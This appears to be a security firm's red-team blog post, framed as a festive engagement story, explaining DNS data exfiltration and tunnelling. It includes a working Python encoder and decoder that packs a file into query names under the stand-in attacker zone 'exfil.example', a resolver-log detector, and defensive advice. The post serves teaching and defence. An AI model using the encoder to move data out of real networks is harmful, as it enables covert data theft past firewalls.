Now that Cybaverse has gained access to the network at Lapland Industries, a test to see if large amounts of data can be transferred to an external source needs to be completed.
Data exfiltration is the unauthorised transfer of information or data out of a company. It can be done maliciously by threat actors or unintentionally by employees.
All threat actors are different and have different motives. If you hold personal information, threat actors may want to extract it to sell to other cyber criminals, who then use it to commit identity theft.
By extracting the data, cyber criminals keep their own copy, so they still hold it even if a Blue Team or a managed detection and response (MDR) service later locks them out of the system. Data extraction does not always have to be a direct breach of your systems either. For example, an employee might send company information to a personal email address that is later compromised.
Yesterday, Cybaverse were able to compromise the designated Naughty or Nice list by embedding a payload on the server. Once a threat actor has access to your network there are a number of different ways they might look to extract data. A common one is to drop a piece of malware onto the network that sends data back to a server the attacker controls. Gruber Group often exfiltrate data over DNS, so that is the exfiltration method Cybaverse will test during this Red Team engagement.
Exfiltrating data using DNS
DNS data exfiltration bypasses outbound traffic restrictions because almost every network has to allow DNS in order to function, so very few firewalls block it. Even where hosts are only permitted to talk to an internal resolver, that resolver recursively forwards any query it cannot answer to the authoritative server for the domain, so a query for a name under an attacker-registered domain still reaches the attacker without the victim host ever connecting to them directly.
DNS tunnelling takes advantage of this by using DNS requests to implement a command and control channel for malware. Outbound queries exfiltrate sensitive data or carry responses to the operator's requests, while the DNS replies carry commands back in. This works because DNS places few restrictions on what a query contains: a name is just a sequence of labels of up to 63 octets each, up to 253 characters in total, and in practice limited to letters, digits and hyphens. Malware therefore encodes chunks of the stolen data (hex or base32 are typical), places them in the subdomain labels of a domain the attacker controls, and adds a sequence number so the pieces can be reassembled. Every such query lands on the attacker's authoritative name server, which records it and can return data of its own in the reply, commonly in TXT, CNAME, NULL or AAAA records, to carry the other direction of the channel.
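The framing just described, as an added example that is not code from the original post nor from any of the tools it names: a client-side encoder that splits a file into query names under an assumed attacker zone (the hypothetical "exfil.example"), respecting the 63-octet label and 253-character name limits, and the server-side reassembly that tolerates the out-of-order and duplicated arrival a recursive resolver produces. It builds and checks the names only; nothing is sent, and the sample list it encodes is constructed.

```python
import base64
import hashlib
from typing import Dict, List

# Added example, not the post's or any named tool's code. Assumed: the attacker
# controls the hypothetical zone "exfil.example" and runs its authoritative
# server, so every query for *.exfil.example reaches them via the victim's
# normal recursive resolver.
ZONE = "exfil.example"
MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a full name is at most 253 characters in text form

# base32 maps 5 bytes to 8 characters; 7 groups fill a 56-character label,
# safely under the 63-octet limit while keeping the alphabet hostname-safe.
BYTES_PER_LABEL = 35


def _b32(chunk: bytes) -> str:
    # Strip '=' padding: it is not a legal hostname character.
    return base64.b32encode(chunk).decode().rstrip("=").lower()


def _unb32(label: str) -> bytes:
    pad = (-len(label)) % 8
    return base64.b32decode(label.upper() + "=" * pad)


def encode_queries(data: bytes, zone: str = ZONE, labels_per_query: int = 3) -> List[str]:
    """Client side: turn a file into the sequence of query names it will resolve.

    Each query is <seq>.<label>[.<label>...].<zone>. The sequence number lets the
    server reorder queries that arrive out of order, and a trailer query carries
    the chunk count and a SHA-256 prefix so the server can verify reassembly.
    """
    per_query = BYTES_PER_LABEL * labels_per_query
    queries = []
    for seq, start in enumerate(range(0, len(data), per_query)):
        piece = data[start:start + per_query]
        labels = [_b32(piece[i:i + BYTES_PER_LABEL])
                  for i in range(0, len(piece), BYTES_PER_LABEL)]
        name = ".".join([str(seq), *labels, zone])
        assert all(len(lab) <= MAX_LABEL for lab in name.split(".")) and len(name) <= MAX_NAME
        queries.append(name)
    digest = hashlib.sha256(data).hexdigest()[:16]
    queries.append(f"end.{len(queries)}.{digest}.{zone}")
    return queries


def decode_queries(seen: List[str], zone: str = ZONE) -> bytes:
    """Server side: reassemble the file from names the authoritative server logged.

    Tolerates duplicates (resolvers retry) and arbitrary arrival order, and
    refuses to return data whose count or digest does not match the trailer.
    """
    suffix = "." + zone
    chunks: Dict[int, bytes] = {}
    expected = None
    for name in seen:
        if not name.endswith(suffix):
            continue  # unrelated query for another zone, ignore
        labels = name[: -len(suffix)].split(".")
        if labels[0] == "end":
            expected = (int(labels[1]), labels[2])
        else:
            chunks[int(labels[0])] = b"".join(_unb32(lab) for lab in labels[1:])
    if expected is None or set(chunks) != set(range(expected[0])):
        raise ValueError("incomplete transfer")
    data = b"".join(chunks[i] for i in range(expected[0]))
    if hashlib.sha256(data).hexdigest()[:16] != expected[1]:
        raise ValueError("digest mismatch")
    return data


if __name__ == "__main__":
    # Constructed sample input standing in for the designated fake list.
    sample = b"\n".join(
        f"child{i:03d},{'naughty' if i % 7 == 0 else 'nice'}".encode() for i in range(200))
    qs = encode_queries(sample)
    print(f"{len(sample)} bytes -> {len(qs)} queries, e.g. {qs[0][:70]}...")
    # Simulate reversed delivery plus one duplicate, as a resolver might produce.
    assert decode_queries(list(reversed(qs)) + qs[:1]) == sample
```

The number of queries is what a defender sees: only about a hundred bytes of file travel in each name, so even a small file becomes a long run of unique, unusually long names under one domain.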
Using DNS to deliver malware
DNS can even be used to deliver malware. DNSStager, for example, is an open-source tool that hides a payload in DNS: the attacker runs an authoritative DNS server for a domain under their control, splits the payload into chunks, and serves each chunk as a DNS record (DNSStager supports AAAA and TXT responses) that a small stager on the victim fetches and reassembles. Each chunk is encrypted before it is placed in a record, so content inspection of the DNS replies sees no recognisable payload, which makes this kind of delivery hard to detect by content alone; the volume and shape of the queries remain visible to anyone logging them. Other tools such as iodine and dnscat2 tunnel arbitrary data over DNS in the same way.
DNS Tunnelling
Cybaverse used DNSStager to deliver a secondary DNS tunnelling application as a proof of concept that Lapland Industries were also susceptible to this type of attack.
We always strive to offer the widest visibility possible on an engagement, often using multiple techniques to achieve the same goal. Using that DNS tunnelling application, Cybaverse took advantage of the fact that no SIEM was in place to detect high volumes of DNS traffic to a single domain, and successfully exfiltrated the designated fake Naughty or Nice list from the internal network. The transfer was far from subtle: each query name carries only a few dozen bytes, so the file left as a steady stream of unique, unusually long names under one domain, exactly the pattern that resolver logging plus a SIEM rule would catch.
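The detection gap described above, shown as an added example rather than anything from the engagement or from Cybaverse's tooling: a small analyser over constructed resolver log lines that groups queries by registered domain and flags the signals a DNS tunnel leaves behind (many unique names under one domain, long names, high-entropy subdomains, and a high share of TXT/NULL queries). The log layout, the thresholds and the zone "exfil.example" are assumptions.

```python
import hashlib
import math
from collections import Counter, defaultdict
from typing import Dict, List

# Added example, not Cybaverse's or Lapland Industries' tooling. The log layout,
# the thresholds and the "exfil.example" zone are assumptions for illustration.

# Constructed sample log (not real traffic) in an "epoch client qname qtype"
# layout: ten ordinary lookups from three workstations, then a burst from one
# host to the attacker-controlled zone.
NORMAL_LINES = [
    "1701590400 10.0.0.12 www.laplandindustries.example A",
    "1701590401 10.0.0.12 outlook.office365.com A",
    "1701590402 10.0.0.12 login.microsoftonline.com A",
    "1701590403 10.0.0.15 update.microsoft.com A",
    "1701590404 10.0.0.15 www.laplandindustries.example A",
    "1701590405 10.0.0.21 mail.laplandindustries.example MX",
    "1701590406 10.0.0.21 outlook.office365.com A",
    "1701590407 10.0.0.12 cdn.jsdelivr.net A",
    "1701590408 10.0.0.15 www.google.com A",
    "1701590409 10.0.0.21 login.microsoftonline.com A",
]


def _tunnel_line(i: int) -> str:
    # Deterministic high-entropy labels standing in for encoded file chunks.
    h = hashlib.sha256(f"chunk{i}".encode()).hexdigest()
    return f"{1701590410 + i} 10.0.0.7 {i}.{h[:56]}.{h[8:60]}.exfil.example TXT"


SAMPLE_LOG = NORMAL_LINES + [_tunnel_line(i) for i in range(40)]

# Assumed thresholds for a short window; tune them against your own baseline.
MAX_UNIQUE_NAMES = 25   # distinct names under one registered domain
MAX_AVG_LEN = 80        # average query-name length in characters
MIN_ENTROPY = 3.5       # bits per character of the subdomain part
MIN_QUERIES = 10        # volume before the entropy and record-type rules apply


def registered_domain(qname: str) -> str:
    """Naive registered domain: the last two labels. Production code should use
    the Public Suffix List so that names under e.g. "co.uk" are not collapsed."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def entropy(text: str) -> float:
    """Shannon entropy in bits per character (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def analyse(lines: List[str]) -> Dict[str, dict]:
    """Group queries by registered domain; return only the domains that trip a rule."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "clients": set(),
                                 "lengths": [], "entropies": [], "qtypes": Counter()})
    for line in lines:
        _ts, client, qname, qtype = line.split()
        dom = registered_domain(qname)
        sub = qname[: -len(dom) - 1] if qname != dom else ""
        s = stats[dom]
        s["queries"] += 1
        s["names"].add(qname)
        s["clients"].add(client)
        s["lengths"].append(len(qname))
        s["entropies"].append(entropy(sub.replace(".", "")))
        s["qtypes"][qtype] += 1

    findings = {}
    for dom, s in stats.items():
        n = s["queries"]
        avg_len = sum(s["lengths"]) / n
        avg_ent = sum(s["entropies"]) / n
        bulk_share = (s["qtypes"]["TXT"] + s["qtypes"]["NULL"]) / n
        reasons = []
        if len(s["names"]) >= MAX_UNIQUE_NAMES:
            reasons.append(f"{len(s['names'])} unique names")
        if avg_len >= MAX_AVG_LEN:
            reasons.append(f"average name length {avg_len:.0f}")
        if n >= MIN_QUERIES and avg_ent >= MIN_ENTROPY:
            reasons.append(f"subdomain entropy {avg_ent:.2f} bits/char")
        if n >= MIN_QUERIES and bulk_share >= 0.5:
            reasons.append(f"{bulk_share:.0%} TXT/NULL queries")
        if reasons:
            findings[dom] = {"queries": n, "unique_names": len(s["names"]),
                             "clients": sorted(s["clients"]), "avg_len": avg_len,
                             "avg_entropy": avg_ent, "reasons": reasons}
    return findings


if __name__ == "__main__":
    for dom, f in analyse(SAMPLE_LOG).items():
        print(f"{dom}: {f['queries']} queries from {f['clients']} -> {'; '.join(f['reasons'])}")
```

Any one of these signals on its own produces false positives (content delivery networks and some security products legitimately use long, random-looking names), so the useful alert is the combination, scoped to a time window and enriched with which client produced the queries.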
Rest assured, at no point did the original naughty and nice list leave the network - even though our Head of Marketing was desperate to see if she had finally made it off the naughty list and onto the nice list for the first time in 20 years, the extreme confidentiality of the file meant it was out of scope.
Penetration testing or Red Team testing
Conducting tests to see whether data can be exfiltrated from your business is one of the most effective ways to highlight possible vulnerabilities. Cyber security experts can conduct a full audit and produce a report that allows you to put a robust plan in place to protect your data and intellectual property.
Data encryption
Encrypting data at rest ensures that if a copy is exfiltrated, it is unreadable to the threat actor. The caveat is that this only holds if the attacker cannot also obtain the key: an attacker with a foothold on a host can usually read whatever the compromised account can read, so encryption has to be paired with tight access control to the data and to the keys.
Security tools
There are several different security tools that can monitor and prevent the exfiltration of data. For example, cloud email security software can prevent data loss that stems from sending information to personal accounts. For the DNS channel specifically, forcing every host to use internal resolvers, blocking direct outbound DNS at the firewall, and feeding resolver query logs into a SIEM gives you both the visibility and the control point that were missing in this test.
Employee training
Employee training is also an effective way of minimising exfiltration risk. A simple policy or procedure, alongside annual training, can help employees keep both their personal and company data safe.
Once Cybaverse had obtained the designated naughty or nice list, they updated Mr and Mrs Claus. Initial preventative steps were discussed and full detail will be provided in the final report. Tomorrow Cybaverse conducts an encryption simulation on the network, the final TTP to test.